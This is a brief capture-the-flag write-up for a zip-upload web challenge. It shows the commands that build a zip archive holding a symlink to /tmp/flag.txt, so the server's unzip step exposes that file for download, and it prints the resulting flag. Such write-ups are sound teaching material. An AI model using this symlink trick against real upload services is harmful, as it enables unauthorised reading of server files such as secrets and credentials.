Initial Inspection
After loading the page we’re greeted with an upload form for zip archives. We’re informed that after uploading we can access the files by appending a filename to a generated UUID.
We inspect the code and learn that our uploaded archive will be unzipped using unzip.
Zip With a Symlink
We can use the zip command to create an archive that’ll preserve symlinks by using the -y option.
In order to retrieve the flag we create a symlink to /tmp/flag.txt and zip it. Once we download it, the symlink will be dereferenced on the target machine.
ln -s /tmp/flag.txt flag_symlink
zip -y archive.zip flag_symlink
We retrieve the flag from https://zipzone-web.challs.csc.tf/files/{RANDOM_UUID}/flag_symlink. The flag is: CSCTF{5yml1nk5_4r3_w31rd}